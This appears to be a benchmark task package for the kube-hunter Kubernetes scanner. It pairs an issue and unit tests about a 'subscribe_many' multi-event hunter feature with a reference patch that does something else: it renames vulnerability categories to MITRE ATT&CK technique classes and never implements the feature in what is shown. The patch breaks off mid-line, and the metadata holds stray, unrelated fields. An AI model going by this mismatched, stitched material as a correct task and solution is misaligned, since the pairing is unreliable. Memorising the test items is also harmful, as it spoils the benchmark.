**Title** Add support for hunters that depend on multiple prerequisite events **Problem** Hunters could only listen to a single event type, making it impossible to trigger logic that requires a combination of different cluster conditions. This limited the ability to run certain checks only after all required information became available. **Root Cause** The event handling infrastructure tracked subscriptions per event class without any mechanism to aggregate multiple events or to determine when a full set of prerequisites had been satisfied. **Fix / Expected Behavior** - Introduce a new subscription method that allows a hunter to declare a list of required events. - Provide a container object that delivers the latest instances of each required event to the hunter when the set is complete. - Maintain internal bookkeeping to track which events have been published for each multi‑event hunter and to detect when all dependencies are fulfilled. - Preserve existing single‑event subscription behavior and filtering logic unchanged. - Update publishing flow to evaluate both single and multi‑event subscriptions, emitting hunters only when appropriate. **Risk & Validation** - Verify that hunters with multiple dependencies fire exactly once per new combination of events and receive the correct latest event data. - Ensure existing single‑event hunters and filters continue to operate without regression. - Run the added unit tests covering the new multi‑event flow and confirm all test suites pass.
448
aquasecurity/kube-hunter
diff --git a/tests/core/test_subscribe.py b/tests/core/test_subscribe.py index f01ef00..6dc0fc8 100644 --- a/tests/core/test_subscribe.py +++ b/tests/core/test_subscribe.py @@ -6,6 +6,8 @@ from kube_hunter.core.events.types import Event, Service from kube_hunter.core.events import handler counter = 0 +first_run = True + set_config(Config()) @@ -19,6 +21,16 @@ class RegularEvent(Service, Event): Service.__init__(self, "Test Service") +class AnotherRegularEvent(Service, Event): + def __init__(self): + Service.__init__(self, "Test Service (another)") + + +class DifferentRegularEvent(Service, Event): + def __init__(self): + Service.__init__(self, "Test Service (different)") + + @handler.subscribe_once(OnceOnlyEvent) class OnceHunter(Hunter): def __init__(self, event): @@ -33,8 +45,36 @@ class RegularHunter(Hunter): counter += 1 +@handler.subscribe_many([DifferentRegularEvent, AnotherRegularEvent]) +class SmartHunter(Hunter): + def __init__(self, events): + global counter, first_run + counter += 1 + + # we add an attribute on the second scan. 
+ # here we test that we get the latest event + different_event = events.get_by_class(DifferentRegularEvent) + if first_run: + first_run = False + assert not different_event.new_value + else: + assert different_event.new_value + + +@handler.subscribe_many([DifferentRegularEvent, AnotherRegularEvent]) +class SmartHunter2(Hunter): + def __init__(self, events): + global counter + counter += 1 + + # check if we can access the events + assert events.get_by_class(DifferentRegularEvent).__class__ == DifferentRegularEvent + assert events.get_by_class(AnotherRegularEvent).__class__ == AnotherRegularEvent + + def test_subscribe_mechanism(): global counter + counter = 0 # first test normal subscribe and publish works handler.publish_event(RegularEvent()) @@ -43,13 +83,47 @@ def test_subscribe_mechanism(): time.sleep(0.02) assert counter == 3 + + +def test_subscribe_once_mechanism(): + global counter + counter = 0 + + # testing the multiple subscription mechanism + handler.publish_event(OnceOnlyEvent()) + + time.sleep(0.02) + assert counter == 1 counter = 0 - # testing the subscribe_once mechanism handler.publish_event(OnceOnlyEvent()) handler.publish_event(OnceOnlyEvent()) handler.publish_event(OnceOnlyEvent()) + time.sleep(0.02) + + assert counter == 0 + + +def test_subscribe_many_mechanism(): + global counter + counter = 0 + + # testing the multiple subscription mechanism + handler.publish_event(DifferentRegularEvent()) + handler.publish_event(DifferentRegularEvent()) + handler.publish_event(DifferentRegularEvent()) + handler.publish_event(DifferentRegularEvent()) + handler.publish_event(DifferentRegularEvent()) + handler.publish_event(AnotherRegularEvent()) time.sleep(0.02) - # should have been triggered once - assert counter == 1 + # We expect SmartHunter and SmartHunter2 to be executed once. 
hence the counter should be 2 + assert counter == 2 + counter = 0 + + # Test using most recent event + newer_version_event = DifferentRegularEvent() + newer_version_event.new_value = True + handler.publish_event(newer_version_event) + + assert counter == 2
[ "tests/core/test_subscribe.py::test_subscribe_mechanism", "tests/core/test_subscribe.py::test_subscribe_once_mechanism", "tests/core/test_subscribe.py::test_subscribe_many_mechanism" ]
[]
Method: EventQueue.subscribe_many(self, events: List[Type[Event]], hook: Optional[Type[Hunter]]=None, predicates: Optional[List[Callable]]=None) Location: kube_hunter.core.events.handler.EventQueue.subscribe_many Inputs: - **events** – list of event classes that the hunter requires. - **hook** – (internal) the hunter class when used programmatically; omitted when used as a decorator. - **predicates** – optional list of callables, one per event, returning bool to filter publishing. Outputs: Returns a decorator that registers the given hunter for the specified multiple‑event subscription and finally returns the original hunter class unchanged. Description: Registers a hunter to be triggered each time a new combination of the specified events has been published, using a `MultipleEventsContainer` to deliver the latest versions of each required event. Function: MultipleEventsContainer.get_by_class(event_class: Type[Event]) → Optional[Event] Location: kube_hunter.core.events.types.MultipleEventsContainer.get_by_class Inputs: - **event_class** – the class of the event to retrieve from the container. Outputs: Returns the first stored event instance whose class exactly matches *event_class*, or None if not present. Description: Allows a hunter that subscribed via `subscribe_many` to extract a specific event instance from the `MultipleEventsContainer` passed to its constructor.
custom-check-github
{ "base_image_name": "python_base_310", "install": [ "pip install -q -r requirements-dev.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/core/test_subscribe.py" }
{ "num_modified_files": 2, "num_modified_lines": 237, "pr_author": "danielsagi", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests a new @handler.subscribe_many decorator and a MultipleEventsContainer to allow hunters to fire only after a set of events have all occurred, with tests defining the expected execution counts and event access. The provided tests directly verify this behavior and match the specification, with no hidden requirements or external references. There are no signals of test‑suite coupling, implicit naming, external URLs, ambiguous specs, unrelated patch artifacts, or required domain knowledge beyond the repo. 
Therefore the task is well‑specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
473e4fe2b57d3e91b91777de0ed65d13658ae9cb
2021-08-19 16:56:12
aquasecurity__kube-hunter-474
diff --git a/README.md b/README.md index 6100636..0d59407 100644 --- a/README.md +++ b/README.md @@ -141,7 +141,7 @@ Available dispatch methods are: * KUBEHUNTER_HTTP_DISPATCH_URL (defaults to: https://localhost) * KUBEHUNTER_HTTP_DISPATCH_METHOD (defaults to: POST) -### Advanced Usage +### Advanced Usage #### Azure Quick Scanning When running **as a Pod in an Azure or AWS environment**, kube-hunter will fetch subnets from the Instance Metadata Service. Naturally this makes the discovery process take longer. To hardlimit subnet scanning to a `/24` CIDR, use the `--quick` option. diff --git a/kube_hunter/core/events/types.py b/kube_hunter/core/events/types.py index aaffd35..030ca32 100644 --- a/kube_hunter/core/events/types.py +++ b/kube_hunter/core/events/types.py @@ -3,15 +3,32 @@ import threading import requests from kube_hunter.conf import get_config -from kube_hunter.core.types import ( - InformationDisclosure, - DenialOfService, - RemoteCodeExec, - IdentityTheft, - PrivilegeEscalation, - AccessRisk, - UnauthenticatedAccess, - KubernetesCluster, +from kube_hunter.core.types import KubernetesCluster +from kube_hunter.core.types.vulnerabilities import ( + GeneralSensitiveInformationTechnique, + ExposedSensitiveInterfacesTechnique, + MountServicePrincipalTechnique, + ListK8sSecretsTechnique, + AccessContainerServiceAccountTechnique, + AccessK8sApiServerTechnique, + AccessKubeletAPITechnique, + AccessK8sDashboardTechnique, + InstanceMetadataApiTechnique, + ExecIntoContainerTechnique, + SidecarInjectionTechnique, + NewContainerTechnique, + GeneralPersistenceTechnique, + HostPathMountPrivilegeEscalationTechnique, + PrivilegedContainerTechnique, + ClusterAdminBindingTechnique, + ARPPoisoningTechnique, + CoreDNSPoisoningTechnique, + DataDestructionTechnique, + GeneralDefenseEvasionTechnique, + ConnectFromProxyServerTechnique, + CVERemoteCodeExecutionCategory, + CVEPrivilegeEscalationCategory, + CVEDenialOfServiceTechnique, ) logger = logging.getLogger(__name__) @@ 
-102,13 +119,30 @@ class Service: class Vulnerability: severity = dict( { - InformationDisclosure: "medium", - DenialOfService: "medium", - RemoteCodeExec: "high", - IdentityTheft: "high", - PrivilegeEscalation: "high", - AccessRisk: "low", - UnauthenticatedAccess: "low", + GeneralSensitiveInformationTechnique: "low", + ExposedSensitiveInterfacesTechnique: "high", + MountServicePrincipalTechnique: "high", + ListK8sSecretsTechnique: "high", + AccessContainerServiceAccountTechnique: "low", + AccessK8sApiServerTechnique: "medium", + AccessKubeletAPITechnique: "medium", + AccessK8sDashboardTechnique: "medium", + InstanceMetadataApiTechnique: "high", + ExecIntoContainerTechnique: "high", + SidecarInjectionTechnique: "high", + NewContainerTechnique: "high", + GeneralPersistenceTechnique: "high", + HostPathMountPrivilegeEscalationTechnique: "high", + PrivilegedContainerTechnique: "high", + ClusterAdminBindingTechnique: "high", + ARPPoisoningTechnique: "medium", + CoreDNSPoisoningTechnique: "high", + DataDestructionTechnique: "high", + GeneralDefenseEvasionTechnique: "high", + ConnectFromProxyServerTechnique: "low", + CVERemoteCodeExecutionCategory: "high", + CVEPrivilegeEscalationCategory: "high", + CVEDenialOfServiceTechnique: "medium", } ) @@ -213,18 +247,21 @@ class ReportDispatched(Event): class K8sVersionDisclosure(Vulnerability, Event): """The kubernetes version could be obtained from the {} endpoint""" - def __init__(self, version, from_endpoint, extra_info=""): + def __init__(self, version, from_endpoint, extra_info="", category=None): Vulnerability.__init__( self, KubernetesCluster, "K8s Version Disclosure", - category=InformationDisclosure, + category=ExposedSensitiveInterfacesTechnique, vid="KHV002", ) self.version = version self.from_endpoint = from_endpoint self.extra_info = extra_info self.evidence = version + # depending from where the version came from, we might want to also override the category + if category: + self.category = category def explain(self): 
return self.__doc__.format(self.from_endpoint) + self.extra_info diff --git a/kube_hunter/core/types.py b/kube_hunter/core/types.py deleted file mode 100644 index c4612e9..0000000 --- a/kube_hunter/core/types.py +++ /dev/null @@ -1,94 +0,0 @@ -class HunterBase: - publishedVulnerabilities = 0 - - @staticmethod - def parse_docs(docs): - """returns tuple of (name, docs)""" - if not docs: - return __name__, "<no documentation>" - docs = docs.strip().split("\n") - for i, line in enumerate(docs): - docs[i] = line.strip() - return docs[0], " ".join(docs[1:]) if len(docs[1:]) else "<no documentation>" - - @classmethod - def get_name(cls): - name, _ = cls.parse_docs(cls.__doc__) - return name - - def publish_event(self, event): - handler.publish_event(event, caller=self) - - -class ActiveHunter(HunterBase): - pass - - -class Hunter(HunterBase): - pass - - -class Discovery(HunterBase): - pass - - -class KubernetesCluster: - """Kubernetes Cluster""" - - name = "Kubernetes Cluster" - - -class KubectlClient: - """The kubectl client binary is used by the user to interact with the cluster""" - - name = "Kubectl Client" - - -class Kubelet(KubernetesCluster): - """The kubelet is the primary "node agent" that runs on each node""" - - name = "Kubelet" - - -class AWS(KubernetesCluster): - """AWS Cluster""" - - name = "AWS" - - -class Azure(KubernetesCluster): - """Azure Cluster""" - - name = "Azure" - - -class InformationDisclosure: - name = "Information Disclosure" - - -class RemoteCodeExec: - name = "Remote Code Execution" - - -class IdentityTheft: - name = "Identity Theft" - - -class UnauthenticatedAccess: - name = "Unauthenticated Access" - - -class AccessRisk: - name = "Access Risk" - - -class PrivilegeEscalation(KubernetesCluster): - name = "Privilege Escalation" - - -class DenialOfService: - name = "Denial of Service" - - -# import is in the bottom to break import loops -from .events import handler # noqa diff --git a/kube_hunter/core/types/__init__.py 
b/kube_hunter/core/types/__init__.py new file mode 100644 index 0000000..0927486 --- /dev/null +++ b/kube_hunter/core/types/__init__.py @@ -0,0 +1,4 @@ +# flake8: noqa: E402 +from .hunters import * +from .components import * +from .vulnerabilities import * diff --git a/kube_hunter/core/types/components.py b/kube_hunter/core/types/components.py new file mode 100644 index 0000000..22f89f9 --- /dev/null +++ b/kube_hunter/core/types/components.py @@ -0,0 +1,28 @@ +class KubernetesCluster: + """Kubernetes Cluster""" + + name = "Kubernetes Cluster" + + +class KubectlClient: + """The kubectl client binary is used by the user to interact with the cluster""" + + name = "Kubectl Client" + + +class Kubelet(KubernetesCluster): + """The kubelet is the primary "node agent" that runs on each node""" + + name = "Kubelet" + + +class AWS(KubernetesCluster): + """AWS Cluster""" + + name = "AWS" + + +class Azure(KubernetesCluster): + """Azure Cluster""" + + name = "Azure" diff --git a/kube_hunter/core/types/hunters.py b/kube_hunter/core/types/hunters.py new file mode 100644 index 0000000..0d7e410 --- /dev/null +++ b/kube_hunter/core/types/hunters.py @@ -0,0 +1,36 @@ +class HunterBase: + publishedVulnerabilities = 0 + + @staticmethod + def parse_docs(docs): + """returns tuple of (name, docs)""" + if not docs: + return __name__, "<no documentation>" + docs = docs.strip().split("\n") + for i, line in enumerate(docs): + docs[i] = line.strip() + return docs[0], " ".join(docs[1:]) if len(docs[1:]) else "<no documentation>" + + @classmethod + def get_name(cls): + name, _ = cls.parse_docs(cls.__doc__) + return name + + def publish_event(self, event): + # Import here to avoid circular import from events package. 
+ # imports are cached in python so this should not affect runtime + from ..events import handler # noqa + + handler.publish_event(event, caller=self) + + +class ActiveHunter(HunterBase): + pass + + +class Hunter(HunterBase): + pass + + +class Discovery(HunterBase): + pass diff --git a/kube_hunter/core/types/vulnerabilities.py b/kube_hunter/core/types/vulnerabilities.py new file mode 100644 index 0000000..d3a8b93 --- /dev/null +++ b/kube_hunter/core/types/vulnerabilities.py @@ -0,0 +1,188 @@ +""" +Vulnerabilities are divided into 2 main categories. + +MITRE Category +-------------- +Vulnerability that correlates to a method in the official MITRE ATT&CK matrix for kubernetes + +CVE Category +------------- +"General" category definition. The category is usually determined by the severity of the CVE +""" + + +class MITRECategory: + @classmethod + def get_name(cls): + """ + Returns the full name of MITRE technique: <MITRE CATEGORY> // <MITRE TECHNIQUE> + Should only be used on a direct technique class at the end of the MITRE inheritance chain. + + Example inheritance: + MITRECategory -> InitialAccessCategory -> ExposedSensitiveInterfacesTechnique + """ + inheritance_chain = cls.__mro__ + if len(inheritance_chain) >= 4: + # -3 == index of mitreCategory class. 
(object class is first) + mitre_category_class = inheritance_chain[-3] + return f"{mitre_category_class.name} // {cls.name}" + + +class CVECategory: + @classmethod + def get_name(cls): + """ + Returns the full name of the category: CVE // <CVE Category name> + """ + return f"CVE // {cls.name}" + + +""" +MITRE ATT&CK Technique Categories +""" + + +class InitialAccessCategory(MITRECategory): + name = "Initial Access" + + +class ExecutionCategory(MITRECategory): + name = "Execution" + + +class PersistenceCategory(MITRECategory): + name = "Persistence" + + +class PrivilegeEscalationCategory(MITRECategory): + name = "Privilege Escalation" + + +class DefenseEvasionCategory(MITRECategory): + name = "Defense Evasion" + + +class CredentialAccessCategory(MITRECategory): + name = "Credential Access" + + +class DiscoveryCategory(MITRECategory): + name = "Discovery" + + +class LateralMovementCategory(MITRECategory): + name = "Lateral Movement" + + +class CollectionCategory(MITRECategory): + name = "Collection" + + +class ImpactCategory(MITRECategory): + name = "Impact" + + +""" +MITRE ATT&CK Techniques +""" + + +class GeneralSensitiveInformationTechnique(InitialAccessCategory): + name = "General Sensitive Information" + + +class ExposedSensitiveInterfacesTechnique(InitialAccessCategory): + name = "Exposed sensitive interfaces" + + +class MountServicePrincipalTechnique(CredentialAccessCategory): + name = "Mount service principal" + + +class ListK8sSecretsTechnique(CredentialAccessCategory): + name = "List K8S secrets" + + +class AccessContainerServiceAccountTechnique(CredentialAccessCategory): + name = "Access container service account" + + +class AccessK8sApiServerTechnique(DiscoveryCategory): + name = "Access the K8S API Server" + + +class AccessKubeletAPITechnique(DiscoveryCategory): + name = "Access Kubelet API" + + +class AccessK8sDashboardTechnique(DiscoveryCategory): + name = "Access Kubernetes Dashboard" + + +class InstanceMetadataApiTechnique(DiscoveryCategory): + name 
= "Instance Metadata API" + + +class ExecIntoContainerTechnique(ExecutionCategory): + name = "Exec into container" + + +class SidecarInjectionTechnique(ExecutionCategory): + name = "Sidecar injection" + + +class NewContainerTechnique(ExecutionCategory): + name = "New container" + + +class GeneralPersistenceTechnique(PersistenceCategory): + name = "General Peristence" + + +class HostPathMountPrivilegeEscalationTechnique(PrivilegeEscalationCategory): + name = "hostPath mount" + + +class PrivilegedContainerTechnique(PrivilegeEscalationCategory): + name = "Privileged container" + + +class ClusterAdminBindingTechnique(PrivilegeEscalationCategory): + name = "Cluser-admin binding" + + +class ARPPoisoningTechnique(LateralMovementCategory): + name = "ARP poisoning and IP spoofing" + + +class CoreDNSPoisoningTechnique(LateralMovementCategory): + name = "CoreDNS poisoning" + + +class DataDestructionTechnique(ImpactCategory): + name = "Data Destruction" + + +class GeneralDefenseEvasionTechnique(DefenseEvasionCategory): + name = "General Defense Evasion" + + +class ConnectFromProxyServerTechnique(DefenseEvasionCategory): + name = "Connect from Proxy server" + + +""" +CVE Categories +""" + + +class CVERemoteCodeExecutionCategory(CVECategory): + name = "Remote Code Execution (CVE)" + + +class CVEPrivilegeEscalationCategory(CVECategory): + name = "Privilege Escalation (CVE)" + + +class CVEDenialOfServiceTechnique(CVECategory): + name = "Denial Of Service (CVE)" diff --git a/kube_hunter/modules/discovery/hosts.py b/kube_hunter/modules/discovery/hosts.py index 5923acc..76d0b40 100644 --- a/kube_hunter/modules/discovery/hosts.py +++ b/kube_hunter/modules/discovery/hosts.py @@ -11,7 +11,7 @@ from kube_hunter.conf import get_config from kube_hunter.modules.discovery.kubernetes_client import list_all_k8s_cluster_nodes from kube_hunter.core.events import handler from kube_hunter.core.events.types import Event, NewHostEvent, Vulnerability -from kube_hunter.core.types import Discovery, 
InformationDisclosure, AWS, Azure +from kube_hunter.core.types import Discovery, AWS, Azure, InstanceMetadataApiTechnique logger = logging.getLogger(__name__) @@ -55,7 +55,7 @@ class AWSMetadataApi(Vulnerability, Event): self, AWS, "AWS Metadata Exposure", - category=InformationDisclosure, + category=InstanceMetadataApiTechnique, vid="KHV053", ) self.cidr = cidr @@ -70,7 +70,7 @@ class AzureMetadataApi(Vulnerability, Event): self, Azure, "Azure Metadata Exposure", - category=InformationDisclosure, + category=InstanceMetadataApiTechnique, vid="KHV003", ) self.cidr = cidr diff --git a/kube_hunter/modules/hunting/aks.py b/kube_hunter/modules/hunting/aks.py index e5c4a16..6c0d0a9 100644 --- a/kube_hunter/modules/hunting/aks.py +++ b/kube_hunter/modules/hunting/aks.py @@ -7,7 +7,7 @@ from kube_hunter.conf import get_config from kube_hunter.modules.hunting.kubelet import ExposedPodsHandler, SecureKubeletPortHunter from kube_hunter.core.events import handler from kube_hunter.core.events.types import Event, Vulnerability -from kube_hunter.core.types import Hunter, ActiveHunter, IdentityTheft, Azure +from kube_hunter.core.types import Hunter, ActiveHunter, MountServicePrincipalTechnique, Azure logger = logging.getLogger(__name__) @@ -20,7 +20,7 @@ class AzureSpnExposure(Vulnerability, Event): self, Azure, "Azure SPN Exposure", - category=IdentityTheft, + category=MountServicePrincipalTechnique, vid="KHV004", ) self.container = container diff --git a/kube_hunter/modules/hunting/apiserver.py b/kube_hunter/modules/hunting/apiserver.py index 5e4aa96..8af3dd8 100644 --- a/kube_hunter/modules/hunting/apiserver.py +++ b/kube_hunter/modules/hunting/apiserver.py @@ -8,10 +8,15 @@ from kube_hunter.modules.discovery.apiserver import ApiServer from kube_hunter.core.events import handler from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure from kube_hunter.core.types import Hunter, ActiveHunter, KubernetesCluster -from kube_hunter.core.types import ( - 
AccessRisk, - InformationDisclosure, - UnauthenticatedAccess, +from kube_hunter.core.types.vulnerabilities import ( + AccessK8sApiServerTechnique, + ExposedSensitiveInterfacesTechnique, + GeneralDefenseEvasionTechnique, + DataDestructionTechnique, + ClusterAdminBindingTechnique, + NewContainerTechnique, + PrivilegedContainerTechnique, + SidecarInjectionTechnique, ) logger = logging.getLogger(__name__) @@ -24,10 +29,10 @@ class ServerApiAccess(Vulnerability, Event): def __init__(self, evidence, using_token): if using_token: name = "Access to API using service account token" - category = InformationDisclosure + category = AccessK8sApiServerTechnique else: name = "Unauthenticated access to API" - category = UnauthenticatedAccess + category = ExposedSensitiveInterfacesTechnique Vulnerability.__init__( self, KubernetesCluster, @@ -44,7 +49,7 @@ class ServerApiHTTPAccess(Vulnerability, Event): def __init__(self, evidence): name = "Insecure (HTTP) access to API" - category = UnauthenticatedAccess + category = ExposedSensitiveInterfacesTechnique Vulnerability.__init__( self, KubernetesCluster, @@ -59,7 +64,7 @@ class ApiInfoDisclosure(Vulnerability, Event): """Information Disclosure depending upon RBAC permissions and Kube-Cluster Setup""" def __init__(self, evidence, using_token, name): - category = InformationDisclosure + category = AccessK8sApiServerTechnique if using_token: name += " using default service account token" else: @@ -111,7 +116,7 @@ class CreateANamespace(Vulnerability, Event): self, KubernetesCluster, name="Created a namespace", - category=AccessRisk, + category=GeneralDefenseEvasionTechnique, ) self.evidence = evidence @@ -125,7 +130,7 @@ class DeleteANamespace(Vulnerability, Event): self, KubernetesCluster, name="Delete a namespace", - category=AccessRisk, + category=DataDestructionTechnique, ) self.evidence = evidence @@ -136,7 +141,7 @@ class CreateARole(Vulnerability, Event): """ def __init__(self, evidence): - Vulnerability.__init__(self, 
KubernetesCluster, name="Created a role", category=AccessRisk) + Vulnerability.__init__(self, KubernetesCluster, name="Created a role", category=GeneralDefenseEvasionTechnique) self.evidence = evidence @@ -150,7 +155,7 @@ class CreateAClusterRole(Vulnerability, Event): self, KubernetesCluster, name="Created a cluster role", - category=AccessRisk, + category=ClusterAdminBindingTechnique, ) self.evidence = evidence @@ -165,7 +170,7 @@ class PatchARole(Vulnerability, Event): self, KubernetesCluster, name="Patched a role", - category=AccessRisk, + category=ClusterAdminBindingTechnique, ) self.evidence = evidence @@ -180,7 +185,7 @@ class PatchAClusterRole(Vulnerability, Event): self, KubernetesCluster, name="Patched a cluster role", - category=AccessRisk, + category=ClusterAdminBindingTechnique, ) self.evidence = evidence @@ -193,7 +198,7 @@ class DeleteARole(Vulnerability, Event): self, KubernetesCluster, name="Deleted a role", - category=AccessRisk, + category=DataDestructionTechnique, ) self.evidence = evidence @@ -206,7 +211,7 @@ class DeleteAClusterRole(Vulnerability, Event): self, KubernetesCluster, name="Deleted a cluster role", - category=AccessRisk, + category=DataDestructionTechnique, ) self.evidence = evidence @@ -219,7 +224,7 @@ class CreateAPod(Vulnerability, Event): self, KubernetesCluster, name="Created A Pod", - category=AccessRisk, + category=NewContainerTechnique, ) self.evidence = evidence @@ -232,7 +237,7 @@ class CreateAPrivilegedPod(Vulnerability, Event): self, KubernetesCluster, name="Created A PRIVILEGED Pod", - category=AccessRisk, + category=PrivilegedContainerTechnique, ) self.evidence = evidence @@ -245,7 +250,7 @@ class PatchAPod(Vulnerability, Event): self, KubernetesCluster, name="Patched A Pod", - category=AccessRisk, + category=SidecarInjectionTechnique, ) self.evidence = evidence @@ -258,7 +263,7 @@ class DeleteAPod(Vulnerability, Event): self, KubernetesCluster, name="Deleted A Pod", - category=AccessRisk, + 
category=DataDestructionTechnique, ) self.evidence = evidence @@ -377,7 +382,7 @@ class AccessApiServerWithToken(AccessApiServer): super().__init__(event) assert self.event.auth_token self.headers = {"Authorization": f"Bearer {self.event.auth_token}"} - self.category = InformationDisclosure + self.category = AccessK8sApiServerTechnique self.with_token = True diff --git a/kube_hunter/modules/hunting/arp.py b/kube_hunter/modules/hunting/arp.py index 6ae8c35..0a37f1d 100644 --- a/kube_hunter/modules/hunting/arp.py +++ b/kube_hunter/modules/hunting/arp.py @@ -5,7 +5,7 @@ from scapy.all import ARP, IP, ICMP, Ether, sr1, srp from kube_hunter.conf import get_config from kube_hunter.core.events import handler from kube_hunter.core.events.types import Event, Vulnerability -from kube_hunter.core.types import ActiveHunter, KubernetesCluster, IdentityTheft +from kube_hunter.core.types import ActiveHunter, KubernetesCluster, ARPPoisoningTechnique from kube_hunter.modules.hunting.capabilities import CapNetRawEnabled logger = logging.getLogger(__name__) @@ -20,7 +20,7 @@ class PossibleArpSpoofing(Vulnerability, Event): self, KubernetesCluster, "Possible Arp Spoof", - category=IdentityTheft, + category=ARPPoisoningTechnique, vid="KHV020", ) diff --git a/kube_hunter/modules/hunting/capabilities.py b/kube_hunter/modules/hunting/capabilities.py index 802ae93..656618b 100644 --- a/kube_hunter/modules/hunting/capabilities.py +++ b/kube_hunter/modules/hunting/capabilities.py @@ -4,7 +4,7 @@ import logging from kube_hunter.modules.discovery.hosts import RunningAsPodEvent from kube_hunter.core.events import handler from kube_hunter.core.events.types import Event, Vulnerability -from kube_hunter.core.types import Hunter, AccessRisk, KubernetesCluster +from kube_hunter.core.types import Hunter, ARPPoisoningTechnique, KubernetesCluster logger = logging.getLogger(__name__) @@ -20,7 +20,7 @@ class CapNetRawEnabled(Event, Vulnerability): self, KubernetesCluster, name="CAP_NET_RAW Enabled", - 
category=AccessRisk, + category=ARPPoisoningTechnique, ) diff --git a/kube_hunter/modules/hunting/certificates.py b/kube_hunter/modules/hunting/certificates.py index db12e66..ee60c98 100644 --- a/kube_hunter/modules/hunting/certificates.py +++ b/kube_hunter/modules/hunting/certificates.py @@ -3,7 +3,7 @@ import logging import base64 import re -from kube_hunter.core.types import Hunter, KubernetesCluster, InformationDisclosure +from kube_hunter.core.types import Hunter, KubernetesCluster, GeneralSensitiveInformationTechnique from kube_hunter.core.events import handler from kube_hunter.core.events.types import Vulnerability, Event, Service @@ -21,7 +21,7 @@ class CertificateEmail(Vulnerability, Event): self, KubernetesCluster, "Certificate Includes Email Address", - category=InformationDisclosure, + category=GeneralSensitiveInformationTechnique, vid="KHV021", ) self.email = email diff --git a/kube_hunter/modules/hunting/cves.py b/kube_hunter/modules/hunting/cves.py index 2e8ffc8..7e8d8a9 100644 --- a/kube_hunter/modules/hunting/cves.py +++ b/kube_hunter/modules/hunting/cves.py @@ -6,11 +6,11 @@ from kube_hunter.core.events import handler from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure from kube_hunter.core.types import ( Hunter, - KubernetesCluster, - RemoteCodeExec, - PrivilegeEscalation, - DenialOfService, KubectlClient, + KubernetesCluster, + CVERemoteCodeExecutionCategory, + CVEPrivilegeEscalationCategory, + CVEDenialOfServiceTechnique, ) from kube_hunter.modules.discovery.kubectl import KubectlClientEvent @@ -25,7 +25,7 @@ class ServerApiVersionEndPointAccessPE(Vulnerability, Event): self, KubernetesCluster, name="Critical Privilege Escalation CVE", - category=PrivilegeEscalation, + category=CVEPrivilegeEscalationCategory, vid="KHV022", ) self.evidence = evidence @@ -40,7 +40,7 @@ class ServerApiVersionEndPointAccessDos(Vulnerability, Event): self, KubernetesCluster, name="Denial of Service to Kubernetes API Server", - 
category=DenialOfService, + category=CVEDenialOfServiceTechnique, vid="KHV023", ) self.evidence = evidence @@ -55,7 +55,7 @@ class PingFloodHttp2Implementation(Vulnerability, Event): self, KubernetesCluster, name="Possible Ping Flood Attack", - category=DenialOfService, + category=CVEDenialOfServiceTechnique, vid="KHV024", ) self.evidence = evidence @@ -70,7 +70,7 @@ class ResetFloodHttp2Implementation(Vulnerability, Event): self, KubernetesCluster, name="Possible Reset Flood Attack", - category=DenialOfService, + category=CVEDenialOfServiceTechnique, vid="KHV025", ) self.evidence = evidence @@ -85,7 +85,7 @@ class ServerApiClusterScopedResourcesAccess(Vulnerability, Event): self, KubernetesCluster, name="Arbitrary Access To Cluster Scoped Resources", - category=PrivilegeEscalation, + category=CVEPrivilegeEscalationCategory, vid="KHV026", ) self.evidence = evidence @@ -100,7 +100,7 @@ class IncompleteFixToKubectlCpVulnerability(Vulnerability, Event): self, KubectlClient, "Kubectl Vulnerable To CVE-2019-11246", - category=RemoteCodeExec, + category=CVERemoteCodeExecutionCategory, vid="KHV027", ) self.binary_version = binary_version @@ -116,7 +116,7 @@ class KubectlCpVulnerability(Vulnerability, Event): self, KubectlClient, "Kubectl Vulnerable To CVE-2019-1002101", - category=RemoteCodeExec, + category=CVERemoteCodeExecutionCategory, vid="KHV028", ) self.binary_version = binary_version diff --git a/kube_hunter/modules/hunting/dashboard.py b/kube_hunter/modules/hunting/dashboard.py index bb31b24..956e120 100644 --- a/kube_hunter/modules/hunting/dashboard.py +++ b/kube_hunter/modules/hunting/dashboard.py @@ -3,7 +3,7 @@ import json import requests from kube_hunter.conf import get_config -from kube_hunter.core.types import Hunter, RemoteCodeExec, KubernetesCluster +from kube_hunter.core.types import Hunter, AccessK8sDashboardTechnique, KubernetesCluster from kube_hunter.core.events import handler from kube_hunter.core.events.types import Vulnerability, Event from 
